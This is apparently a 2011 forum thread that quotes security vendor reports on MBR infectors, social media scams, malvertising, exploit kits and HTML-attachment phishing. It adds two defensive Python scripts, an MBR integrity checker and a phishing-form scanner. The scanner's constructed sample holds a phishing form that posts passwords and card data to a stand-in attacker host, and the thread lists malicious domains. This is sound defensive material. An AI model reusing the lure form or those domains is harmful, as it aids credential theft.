Smitnyl - MBR infector...
- http://www.f-secure.com/weblog/archives/00002101.html
Feb. 17, 2011 - "... an MBR file system infector such as Trojan:W32/Smitnyl.A (98b349c7880eda46c63ae1061d2475181b2c9d7b), which appears to be distributed via some free file-sharing networks, seems worth a quick analysis, even if it only targets one portable executable system file and the infection is straightforward compared to common virus file infectors. Smitnyl.A first infects the MBR via raw disk access. Then it replaces it with a malicious MBR containing the file infector routine... MBR File System Infector... can bypass Windows File Protection (WFP). As WFP is running in protected mode, any WFP-protected file will be restored immediately if the file is replaced...
Userinit... is one of the processes launched automatically when the system starts, allowing the malware to execute automatically when the system starts.
Smitnyl infects Userinit from the first stage of the boot sequence. When the MBR is loaded to 0x7C00, it determines the active partition from the partition table and also the starting offset of boot sector. It then checks the machine’s file system type... Smitnyl will check for the Windows path from $ROOT down to the System32 directory, where userinit.exe is located... After decoding, it launches %temp%\explorer.exe using ShellExecute — this serves as a decoy to hide the infection. At the same time, it will execute the real explorer.exe using Winexec... there is nothing special about the final payload — it is merely a downloader. The infected userinit.exe disables 360safe's IE browser protection so that the downloader can retrieve files from the remote server http://[...].perfectexe.com/."
(More detail at the F-secure URL above.)

- http://www.urlvoid.com/scan/perfectexe.com
Detections: 8/19 (42%)
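The F-Secure analysis quoted above describes the mechanics: the malicious MBR is loaded at 0x7C00, reads the partition table to find the active partition, and the boot code is replaced while the partition table is left intact. As an added example (not F-Secure's code), the script below does the corresponding forensic check on a captured sector 0: it verifies the 0x55AA signature, decodes the four partition entries, and hashes the 440-byte boot-code area so it can be compared with a baseline hash taken while the machine was known clean. It assumes a classic MBR rather than GPT; the two sample MBRs, the "clean" prologue bytes and the baseline are constructed, not real images.

```python
"""Parse a 512-byte MBR and compare its boot code with a known-good hash.

Added example; not F-Secure's analysis code. An MBR infector like the one
described replaces the boot code in sector 0 but keeps the partition table,
so it can still find the active partition. The check below: (1) verify the
0x55AA signature, (2) decode the four partition entries, (3) hash the
440-byte boot-code area and compare with a baseline taken while the machine
was clean. Assumes a classic MBR, not GPT. The sample MBRs are constructed.
"""
import hashlib
import struct
import sys

BOOT_CODE_LEN = 440            # bytes 440..445 hold the disk signature/padding
PART_TABLE_OFF = 446
PART_ENTRY_FMT = "<B3xB3xII"   # status, CHS start (skip), type, CHS end (skip), LBA start, sectors
MBR_SIGNATURE = b"\x55\xaa"


def parse_mbr(mbr: bytes) -> dict:
    """Decode signature, partition table and boot-code hash of one sector."""
    if len(mbr) != 512:
        raise ValueError("MBR must be exactly 512 bytes")
    if mbr[510:512] != MBR_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for index in range(4):
        offset = PART_TABLE_OFF + index * 16
        status, ptype, lba_start, sectors = struct.unpack_from(PART_ENTRY_FMT, mbr, offset)
        if ptype == 0:             # empty slot
            continue
        partitions.append({"index": index, "active": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": sectors})
    return {
        "boot_code_sha256": hashlib.sha256(mbr[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
        "active_partition": next((p for p in partitions if p["active"]), None),
    }


def boot_code_matches(mbr: bytes, baseline_sha256: str) -> bool:
    """True when the boot-code area is byte-identical to the clean baseline."""
    return parse_mbr(mbr)["boot_code_sha256"] == baseline_sha256


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed MBR: given boot code plus one active NTFS partition at LBA 2048."""
    mbr = bytearray(512)
    mbr[:len(boot_code)] = boot_code
    entry = struct.pack("<B3sB3sII", 0x80, b"\0\0\0", 0x07, b"\0\0\0", 2048, 204800)
    mbr[PART_TABLE_OFF:PART_TABLE_OFF + 16] = entry
    mbr[510:512] = MBR_SIGNATURE
    return bytes(mbr)


# Constructed stand-ins: a "clean" prologue (xor ax,ax / mov ss,ax / mov sp,7C00h)
# and a different boot code over the same partition table, as an infector leaves it.
CLEAN_MBR = build_sample_mbr(b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 32)
BASELINE_SHA256 = parse_mbr(CLEAN_MBR)["boot_code_sha256"]
REPLACED_MBR = build_sample_mbr(b"\xeb\x3c\x90" + b"\xcc" * 64)

if __name__ == "__main__":
    # Usage: python mbr_check.py <sector0.bin> <baseline-sha256>
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            sector = f.read(512)
        baseline = sys.argv[2]
    else:
        sector, baseline = REPLACED_MBR, BASELINE_SHA256
    info = parse_mbr(sector)
    print("active partition:", info["active_partition"])
    print("boot code intact:", boot_code_matches(sector, baseline))
```

Take sector 0 from a boot CD or a disk image rather than from inside the running OS: code that owns the boot sequence can also interpose on reads of it, so a comparison made from the suspect system proves little. A matching partition table with a non-matching boot-code hash is exactly the signature of the replacement the analysis describes.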


2011-02-18, 14:22

Social engineering to infect with malware ...
- http://www.securitypark.co.uk/security_article265838.html
18/02/2011 - "In the past weeks, new malicious codes that use Facebook to ensnare victims have been wreaking havoc. The recent trend for developing computer threats designed to spread by exploiting the most popular social media continues to gather pace. One of these, Asprox.N, is a Trojan that reaches potential victims via email. It deceives users by telling them that their Facebook account is being used to distribute spam and that, for their security, the login credentials have been changed. It includes a fake Word document supposedly containing the new password. The email attachment has an unusual Word icon, and is called Facebook_details.exe. This file is really the Trojan which, when run, downloads a .doc file that runs Word to make users think the original file has opened. The Trojan, when run, downloads another file designed to open all available ports, connecting to various mail service providers in an attempt to spam as many users as possible. The other, Lolbot.Q, is distributed across IM applications such as MSN and Yahoo!, displaying a message with a malicious link. This link downloads a worm designed to hijack Facebook accounts and prevent users from accessing them. If users then try to log in to Facebook, a message appears informing them that the account has been suspended and that to reactivate it they must complete a questionnaire, with the offer of prizes –including laptops, iPads, etc.– to encourage users to take part... PandaLabs advises all users to be wary of any messages with unusually eye-catching subjects, whether via email or IM or any other channel; and to be careful when clicking on external links in Web pages..."
- http://pandalabs.pandasecurity.com/

:mad: :mad:

2011-02-23, 21:00

Oddjob Trojan keeps banking sessions open after victims log out
- http://www.theregister.co.uk/2011/02/22/oddjob_banking_trojan/
February 22, 2011 - "... OddJob Trojan hijacks customers’ online banking sessions in real time using their session ID tokens. By keeping accounts open even after victims think they have quit, the malware creates a window for fraudsters to loot compromised accounts and commit fraud... Trusteer, the transaction security firm that discovered the malware, said it made the discovery a few months ago but is only able to report on it now following the conclusion of a police investigation. OddJob is being used by cyber-crooks based in Eastern Europe to attack their customers in several countries including the USA, Poland and Denmark... More information on the Oddjob Trojan can be found in a blog post by Trusteer here*."
* http://www.trusteer.com/blog/new-financial-trojan-keeps-online-banking-sessions-open-after-users-%E2%80%9Clogout%E2%80%9D


2011-02-25, 01:56

Facebook clickjacking malware - in Italian...
- http://nakedsecurity.sophos.com/2011/02/22/facebook-clickjacking-malware-italian-disguises/
February 22, 2011 - "Non-English speaking Facebook users shouldn't be fooled into believing that they are somehow immune from the scams and attacks that plague the social networking site. The latest few campaigns seen by SophosLabs, for instance, target Italian users of the social network... Colorful clickjacking attacks, requiring users to click on a series of rainbow-colored boxes without realizing they're authorizing other actions, are nothing new of course. As more and more criminals discover how successful attacks via Facebook can be, we can expect the tried-and-trusted techniques of the English-speaking world to be cloned elsewhere around the globe..."


2011-02-26, 17:05

Ransomware a successor of scareware?
- http://community.websense.com/blogs/securitylabs/archive/2011/02/24/the-ransomway.aspx
24 Feb 2011 - "... We dare to say it is not. Both malware groups try to convince the victim that there is no way to avoid paying money, although the approach is very different. With scareware the victims at least have a chance to resist the social engineering offering the only solution and work on the cleaning process on their own. With ransomware this chance hardly exists at all. Yes, there are many similarities and it is likely the same people stand behind both types of malware groups. However, in one case there is a "seller" offering the "products and services"; in the other one an extorter asking for ransom. Even though both are illegal and dishonest, the approach is different.
Restoration and Protection: Restoration of data or access depend on the kind of malware. In some cases it is possible to download a utility and clean the infected system, in other cases to replace malicious parts with clean ones. Unfortunately, there is no means to bypass malware such as Gpcode. Therefore the only protection is to keep up-to-date backups stored -off- the machine all the time..."
- http://www.youtube.com/watch?v=JZT0JZybfVc


2011-02-28, 17:37

UK - malvertising attack...
- http://www.theregister.co.uk/2011/02/28/tainted_ads_blight_uk_sites/
28 Feb. 2011 - "Several highly trafficked UK sites – including the website of the London Stock Exchange – served malware-tainted ads as the result of a breach of security by a third-party firm they shared in common. Surfers visiting auto-trading site Autotrader.co.uk and the cinema site Myvue.com were also exposed to the attack, which stemmed from a breach at their common ad provider, Unanimis, rather than at any of the three sites themselves. Unconfirmed reports suggest eBay.co.uk was also affected. The malicious ads made several concealed redirects before dropping surfers on a portal pimping rogue anti-virus (AKA scareware)... Websense** confirmed the attack on Monday, saying it had been tracking the progress of the attack over recent days..."
* http://www.highseverity.com/2011/02/london-stock-exchange-hit-by-malware.html

** http://community.websense.com/blogs/securitylabs/archive/2011/02/28/myvue-com-and-autotrader-co-uk-infected-with-malvertizing.aspx


2011-03-01, 12:26

Morgan Stanley security breach...
- http://www.bloomberg.com/news/2011-02-28/morgan-stanley-network-hacked-in-same-china-based-attacks-that-hit-google.html
2011-02-28 - "Morgan Stanley experienced a “very sensitive” break-in to its network by the same China-based hackers who attacked Google Inc.’s computers more than a year ago, according to leaked e-mails from a cyber-security company working for the bank. The e-mails from the Sacramento, California-based computer security firm HBGary Inc., which identify the first financial institution targeted in the series of attacks, said the bank considered details of the intrusion a closely guarded secret... The HBGary e-mails don’t indicate what information may have been stolen from Morgan Stanley’s databanks or which of the world’s largest merger adviser’s multinational operations were targeted... a spokeswoman for the New York-based bank, which unlike Google didn’t disclose the attacks publicly, declined to comment on them specifically... The hackers successfully implanted software designed to steal confidential files and internal communications, according to dozens of HBGary e-mails that detail efforts to plug the holes. One e-mail, dated June 19, said that the attackers may be the same ones who had hit a U.K.-based defense contractor and discusses hacking software called Monkif, which can be used by intruders to remotely orchestrate a sophisticated form of cyber attack known as an ‘advanced persistent threat’ or APT..."
- http://blog.damballa.com/?p=341


2011-03-01, 18:29

"You have received a gift..." of malware...
- http://blog.mxlab.eu/2011/03/01/you-have-received-a-gift-from-one-of-our-members-emails-lead-to-malware/
March 1, 2011 - "... new trojan distribution campaign by email with the subject "You have received a gift from one of our members !" The email is sent from the spoofed address "gifts@freeze.com", while the SMTP from address is "_www@pictry.loc"... The URL in the email leads to hxxp:// www .i-tec .it/gift.pif and this malicious file is 844kB large... A Backdoor.IRCBot is installed, opening a backdoor on the infected computer, combined with Trojan.RunKeys which makes sure that the trojans are started when the computer boots... the malware will make a connection to a remote IRC server..."
(Screenshots and more detail available at the MXLabs URL above.)

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d


2011-03-02, 15:21

Twitter survey SCAM...
- http://nakedsecurity.sophos.com/2011/03/02/11-6-hours-survey-scam-spreads-like-wildfire-on-twitter/
March 2, 2011 - "A rogue application has caught Twitter users off their guard today, with thousands of people duped into clicking on links believing that it will reveal how many hours they have spent on Twitter... However, if you click on the bit.ly link being used in the message you are taken to a page which attempts to connect a rogue application called "Time on Tweeter" with your Twitter account. The application instantly tweets a message to your Twitter feed, claiming that you have also spent 11.6 hours on Twitter... spreading the link virally, and then directs you to a page which presents a revenue-generating survey on behalf of the scammers. Affected users should revoke the application's access to their Twitter account immediately..."
(Screenshots available at the Sophos URL above.)


2011-03-07, 23:38
FYI... "SCAM of the Day" - it's almost that bad...

Facebook SCAMS prolific...
- http://nakedsecurity.sophos.com/?s=Facebook+scams&x=0&y=0
March 7, 2011, March 5, 2011, March 3, 2011, March 2, 2011, etc...


2011-03-08, 11:35

SWF embedded JavaScript
- http://blogs.technet.com/b/mmpc/archive/2011/03/07/embedded-javascript-in-swf.aspx
7 Mar 2011 - "... Since the beginning of this year, 89% of the targets were in South Korea with 75% of them specifically in Seoul. Here’s a chart with a breakdown by unique machines in the months January and February of this year (there has been no activity in March):
- http://www.microsoft.com/security/portal/blog-images/JASWI-0b.jpg
Attack attempts by unique machines in the months January and February of 2011
... The malware Trojan:SWF/Jaswi.A is unlike other SWF malware; other SWF malware typically calls “getURL <website address>” within an ACTION tag in order to visit a malicious website link without user consent... Trojan:SWF/Jaswi.A contains an embedded malicious JavaScript that initiates a legal Windows API call to trigger the payload... the legal function ExternalInterface.call() has been made to complete a procedure of initiating JavaScript injection... Internet Explorer vulnerability CVE-2010-0806 has been abused! This particular exploit affects Microsoft Internet Explorer versions 6, 6+SP1 and 7, and could allow a remote attacker to execute arbitrary code... The file “uusee.exe” from the obfuscated URL shown above is actually a prevalent password stealer in China... the embedded JavaScript technique used in the malicious SWF... appears to be a trend and may become a popular method..."


2011-03-08, 17:18

Malvertisements - a plague...
- http://threatpost.com/en_us/blogs/one-million-web-sites-infected-end-2010-030711
March 7, 2011 - "... The Dasient Q4 Malware Update* reported that more than one million Web sites were infected in the last quarter of 2010. That period saw a 25% growth in malicious advertisements from the previous quarter, as attackers found ways to sneak malicious code into widely used syndicated online ad networks. It's a trend that security experts see accelerating in 2011, as malicious advertisements, sometimes referred to as 'malvertisements,' crop up on high profile sites, said Neil Daswani, Chief Technology Officer at Dasient. Daswani said that, overall, his company saw a 100% increase in the amount of malicious advertising from the third to fourth quarters of 2010. However, much of that was due to an expansion of the sites Dasient monitored, with an increasing focus on so-called 'remnant' ad networks, which aggregate 'remnant' advertisements from direct marketers, who often have little oversight about where the ads appear... In recent weeks, well-ranked sites such as Autotrader .co.uk, cinema site Myvue .com and londonstockexchange .com were reported to have served up malicious advertisements. Malicious ads are commonly used to display pop-up messages with links that take users to a drive-by download Web site that downloads rogue anti-virus programs or other threats..."
* http://blog.dasient.com/2011/03/dasient-q4-malware-update-significant.html


2011-03-11, 21:05

Virut malware spreads with warez ..
- http://techblog.avira.com/2011/03/11/polymorphic-virut-malware/en/
March 11, 2011 - "W32/Virut.ce is one of the most widespread pieces of malware which can be found on infected computers. This file infector gets massively spread bundled with illegal software (warez). The virus is infecting executable files using latest techniques which make detecting and treating those files particularly difficult. On the current threat landscape we see more server-side polymorphic malware, infecting executable files is not as popular as a few years ago. During the last years emulation techniques have become better which makes detection of polymorphic malware much easier. The authors of the virus weren’t put off by the difficulties they faced in trying to infect executable files. But W32/Virut.ce is not only infecting executable files, the virus also includes a backdoor using the IRC protocol. This allows attackers to download and run further malware from the Internet which can (as example) steal information. The server to which the malware connects is a pre-defined IRC server, the channel is called “virtu”..."
- http://techblog.avira.com/wp-content/uploads/2011/03/Analysis_W32.Virut_.ce_.pdf
(PDF, 1 MB)


2011-03-15, 18:09

FTC advisory - charity SCAMS
- http://www.ftc.gov/opa/2011/03/earthquake.shtm
03/14/2011 - "After the earthquake that rocked Japan’s northeast coast and triggered a widespread tsunami last week, the Federal Trade Commission is urging consumers to be cautious of potential charity scams... carefully consider urgent appeals for aid that (are received) in person, by phone or mail, by e-mail, on websites, or on social networking sites. The agency’s Charity Checklist* advises consumers about donating wisely to charities..."
* http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt114.shtm

- http://community.websense.com/blogs/securitylabs/archive/2011/03/15/cybercriminals-utilize-japanese-disaster.aspx
15 Mar 2011


2011-03-17, 04:46

Phish targets BoA, PayPal...
- http://www.theregister.co.uk/2011/03/17/phishers_outgun_firefox_chrome/
17th March 2011 - "... phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez*, the locally stored file opens a web form that collects the customers' login credentials, credit card numbers and other sensitive information and then uses a POST request to zap them to a PHP application on a legitimate website that's been compromised. By avoiding the use of more verbose GET requests and known phishing sites, the scam flies completely under the radar of the browsers' fraud protection features..."
* http://labs.m86security.com/2011/03/phishing-scam-in-an-html-attachment/
March 15th, 2011 - "... Phishers... have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser..."


2011-03-18, 13:12

Twitter SCAMS spreading fast
- http://nakedsecurity.sophos.com/2011/03/17/twitter-users-are-not-smarter-than-facebook-users-profile-views-scam-spreading-fast/
March 17, 2011 - "... Thousands of Twitter users are falling once again for a scam that requires victims to grant access to a malicious application. Today's scam seems to be a continuance of a trend in which the scammers are adapting their ego-driven bogus Facebook apps to operate on Twitter... If you accept the application, not only will it post to your Twitter feed, it will also display an image with a random number that supposedly represents the number of people who have viewed your profile. Not surprisingly, the revenue generating opportunity for these scammers is a fake IQ test that suggests you could win a free iPad*... The advice remains the same as for Facebook. Be cautious of which games/apps you approve and carefully audit the authorization page to see if an app wants control of your account or permission to post..."
* http://sophosnews.files.wordpress.com/2011/03/twitterantispam500.png?w=500&h=244


2011-03-18, 18:27

SPAM/phish continues...
- http://www.us-cert.gov/current/#ongoing_phishing_attack
March 18, 2011 - "... public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment. This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing the user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks; this method of attack is able to bypass that security mechanism..."

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d
March 18, 2011
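The M86 and US-CERT posts above, and the HMRC "Tax.Refund.New.Message.Alert .HTML" lure earlier in the thread, all describe the same trick: the phishing page travels as an HTML attachment and renders from disk, so the browser never issues a GET to a phishing URL that its blocklist could match; only the final POST to a compromised PHP script leaves the machine. As an added example (not code from M86, US-CERT or AppRiver), the script below shows the check a mail gateway can still make: open each HTML attachment, find every <form>, and flag those that send credential, card or security-question fields to an absolute external URL. The constructed message, the host names and the sensitive-field name list are assumptions for illustration.

```python
"""Find credential-harvesting forms inside HTML e-mail attachments.

Added example; not code from M86, US-CERT or AppRiver. The attacks these
posts describe keep the phishing page in an HTML attachment, so no phishing
URL is fetched with GET; only the final POST leaves the machine. A gateway
can still catch it by opening HTML attachments and looking for a <form> that
sends sensitive fields to an absolute, external URL. The message and the
host names below are constructed.
"""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic field-name fragments (assumption); extend for local banks and brands.
SENSITIVE_NAMES = ("password", "passwd", "pin", "ssn", "card", "cvv",
                   "maiden", "mmn", "sort_code", "account")


class FormScanner(HTMLParser):
    """Record every <form> with its action, method and input names/types."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "get").lower(), "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current["fields"].append((a.get("name", "").lower(), a.get("type", "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_html(html: str) -> list:
    """Return forms that send sensitive fields to an absolute (off-machine) URL."""
    scanner = FormScanner()
    scanner.feed(html)
    hits = []
    for form in scanner.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        sensitive = [name for name, ftype in form["fields"]
                     if ftype == "password" or any(frag in name for frag in SENSITIVE_NAMES)]
        if host and sensitive:      # relative actions cannot leave the local page
            hits.append({"action": form["action"], "host": host,
                         "method": form["method"], "sensitive_fields": sensitive})
    return hits


def scan_eml(raw: bytes) -> list:
    """Parse an RFC 5322 message and scan each HTML attachment."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    hits = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not filename.lower().endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):   # e.g. application/octet-stream with an .html name
            body = body.decode("utf-8", "replace")
        for hit in scan_html(body):
            hits.append(dict(hit, attachment=filename))
    return hits


def build_sample_eml() -> bytes:
    """Constructed lure: a 'refund' mail whose attached form POSTs to a compromised host."""
    html = """<html><body><h2>Tax refund: confirm your details</h2>
<form method="POST" action="http://compromised-site.example/files/process.php">
Email <input name="email"> Password <input name="password" type="password">
Card <input name="cardnumber"> CVV <input name="cvv2"> Mother's maiden name <input name="mmn">
<input type="submit" value="Submit refund claim"></form></body></html>"""
    msg = EmailMessage()
    msg["From"] = "refunds@tax-office.example"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Refund recalculation: action required"
    msg.set_content("A miscalculation was detected. Open the attached form to claim your refund.")
    msg.add_attachment(html, subtype="html", filename="Tax.Refund.Form.html")
    return bytes(msg)


if __name__ == "__main__":
    for hit in scan_eml(build_sample_eml()):
        print(f'{hit["attachment"]}: {hit["method"].upper()} to {hit["host"]} with {hit["sensitive_fields"]}')
```

The destination host is the useful artefact: it is a compromised legitimate site, so it belongs on a watch-list and in a notification to its owner rather than on a permanent block-list. The field-name matching is a heuristic and will mis-fire on names like "shipping"; treat a hit as a triage signal, not a verdict.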


2011-03-19, 04:48

Fake Facebook email - Zbot and Black Hole Exploit Kit "all in one"
- http://community.websense.com/blogs/securitylabs/archive/2011/03/18/zbot-and-blackhole-exploit-kit-all-in-facebook-comments-spam.aspx
18 Mar 2011 - "Websense... has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually be originating from the Cutwail/Pushdo spam bot. This time round, the Cyber criminals employ two attack vectors: social engineering and an exploit kit. Both end up with the Zeus/Zbot Trojan installed on the targeted machines... The malicious email is spoofed to appear to be coming from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as a formal Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection*... The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today - the Blackhole exploit kit. -Any- successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine..."
* http://www.virustotal.com/file-scan/report.html?id=81b65dd4f92fc29ba3f8062ed69fcb89a703e1c7d1ded2ff956aee11d5a2c0f1-1300384459
File name: facebook.update.utility.exe.1
Submission date: 2011-03-17 17:54:19 (UTC)
Current status: finished
Result: 3/43 (7.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=81b65dd4f92fc29ba3f8062ed69fcb89a703e1c7d1ded2ff956aee11d5a2c0f1-1300478516
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-18 20:01:56 (UTC)
Result: 14/41 (34.1%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=81b65dd4f92fc29ba3f8062ed69fcb89a703e1c7d1ded2ff956aee11d5a2c0f1-1300555240
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-19 17:20:40 (UTC)
Result: 18/41 (43.9%)


2011-03-21, 12:18

Tax Season - phishing scams, malware campaigns
- http://www.us-cert.gov/current/#us_tax_season_phishing_scams1
March 16, 2011 - "... These phishing scams and malware campaigns may include, but are not limited to, the following:
* information that refers to a tax refund
* warnings about unreported or under-reported income
* offers to assist in filing for a refund
* details about fake e-file websites
These messages which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code...
• Do not follow unsolicited web links in email messages.
• Maintain up-to-date antivirus software..."
- http://www.irs.gov/privacy/article/0,,id=179820,00.html?portlet=5

(More info and detail at both URL's above.)


2011-03-25, 19:30

Spotify users attacked by drive-by malware...
- http://news.netcraft.com/archives/2011/03/25/spotify-free-users-attacked-by-malware.html
25 March, 2011 - "Users of the Spotify Free music streaming software have been attacked by drive-by malware. At least one attack used a Java exploit to drop malicious executable code on a victim's computer, with AVG software identifying one of the malicious payloads as Trojan horse Generic_r.FZ. Another threat blocked by AVG was a Blackhole Exploit Kit hosted on the uev1 .co .cc domain. Several people have reported the problem to Spotify over the past 24 hours, and attacks are still being reported at the time of publication. It is believed that the attacks are being launched through malicious third-party adverts which are displayed in ad-supported versions of the Spotify software. By exploiting local software vulnerabilities, the attacker can then install malware on unprotected computers."

- http://community.websense.com/blogs/securitylabs/archive/2011/03/25/spotify-application-serves-malicious-ads.aspx
25 Mar 2011 - "... The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24... In this case the malicious ad is actually displayed inside of the Spotify application... The application will render the ad code and run it as if it were run inside a browser. This means that the Blackhole Exploit Kit works perfectly fine and it's enough that the ad is just displayed to you in Spotify to get infected, you don't even have to click on the ad itself. So if you had Spotify open but running in the background, listening to your favorite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all 3rd party ads in the free version while they did their investigation but the ads have now been turned back on again. Once the ad was displayed, the computer would connect to hxxp: //uev1 .co .cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains... One of the vulnerabilities the exploit kit uses is a vulnerability in Adobe Reader/Acrobat. The kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file*. Once the fake AV is launched it connects to the following domains to download additional content, including a rootkit** which is a packed version of TDSS:
• tuartma .in, rappour .in, findstiff .org, searchcruel .org, findclear .org, replity .in, searchgrubby .org, demivee .in, ripplig .in..."
(Screenshots and more detail available at the URL above.)
* http://www.virustotal.com/file-scan/report.html?id=a41b05120be3018082eff5d75811b166d1cf9dccb7c2ea3da3d42fd090c97acf-1301413767
File name: L9FPB1.pdf
Submission date: 2011-03-29 15:49:27 (UTC)
Result: 12/43 (27.9%)

** http://www.virustotal.com/file-scan/report.html?id=7bb753b1cdfd15bde7b321542be5d1708c931467ce80de3b8fbf8fb98370f261-1301086553
File name: spotify_dropped.exe
Submission date: 2011-03-25 20:55:53 (UTC)
Result: 4/43 (9.3%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=7bb753b1cdfd15bde7b321542be5d1708c931467ce80de3b8fbf8fb98370f261-1301408014
File name: f5dcd2415fa4b069c0b934baee109ea5
Submission date: 2011-03-29 14:13:34 (UTC)
Result: 21/41 (51.2%)


2011-04-05, 07:30

Twitter worm "Profile Spy"...
- http://www.theregister.co.uk/2011/04/05/twitter_worm/
5 April 2011 - "... a virally spreading worm that attempts to make money by scamming users into filling out surveys and viewing advertisements.
The rogue Twitter app is known as Profile Spy and gets installed by people who are tricked into believing it can tell them who has been viewing their online microposts. “Wow! See who viewed your twitter with Profile Spy,” the come-on reads. Those who click on the link are asked to allow the app to access and update their account data. Once they do so, they are presented with an unending series of popups for online surveys and ads promoting car insurance, long distance services and games, according to Errata Security CEO Rob Graham*, who blogged about the worm on Monday..."
* http://erratasec.blogspot.com/2011/04/anatomy-of-twitter-worm-profile-spy.html
April 04, 2011


2011-04-05, 19:27

SpyEye banking trojan - same as ZeuS...
- http://www.theregister.co.uk/2011/04/05/spyeye_mobile_trojan/
5 April 2011 - "Cybercrooks have deployed a sophisticated man-in-the-mobile attack using the SpyEye banking Trojan toolkit. The Trojan, which infects Windows machines, displays additional content on a targeted European bank's webpage that requests prospective marks to input their mobile phone number and the IMEI of the device. The bank customer is informed the information is needed so that a new "digital certificate" can be sent to the phone... More information on the SpyEye-based mobile banking Trojan attack can be found in a blog post by F-Secure here*."
* http://www.f-secure.com/weblog/archives/00002135.html
April 4, 2011


2011-04-06, 13:29

Symantec Internet Security Threat Report...
- http://www.symantec.com/about/news/release/article.jsp?prid=20110404_03
April 5, 2011 – "Symantec... today announced the findings of its Internet Security Threat Report, Volume 16, which shows a massive threat volume of more than 286 million new threats last year, accompanied by several new megatrends in the threat landscape...
> 2010: The Year of the Targeted Attack...
> Social Networks: Fertile Ground for Cybercriminals...
> Attack Toolkits Focus on Java...
> Mobile Threat Landscape Comes Into View...
> Key Facts and Figures:
• 286 million new threats...
• 93 percent increase in Web-based attacks...
• 260,000 identities exposed per breach...
• 14 new zero-day vulnerabilities...
• 6,253 new vulnerabilities...
• 42 percent more mobile vulnerabilities...
• One botnet with more than a million spambots - Rustock..."
(More detail available at the URL above.)


2011-04-10, 12:59

Facebook "video" SCAMS...
- http://community.websense.com/blogs/securitylabs/archive/2011/04/09/quot-the-hottest-amp-funniest-golf-course-video-quot-scam-on-facebook.aspx
9 Apr 2011 - "... scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video - LOL"... When clicking on the link you're taken to the following page, tricking you into not only liking the page but also sharing it with your friends. It's doing this by using standard Facebook APIs... After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam so in the end there's no video at all... As always, if a video forces you to like, share, or install an app to view it, DON'T..."


2011-04-13, 14:54

Virus Outbreak in Progress...
- http://www.ironport.com/toc/

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d
Malicious PDF Attachment E-mail Messages - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22911
Fake Photograph Link E-mail Messages - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22924
Fake Parcel Delivery Notification E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22696
Fake Facebook Personal Message E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=20961
Malicious United Postal Svc Delivery Failure E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22769

Fake Scanned Document E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21429
Fake Facebook Password Reset Notification E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22907
Fake Official Letter E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22910
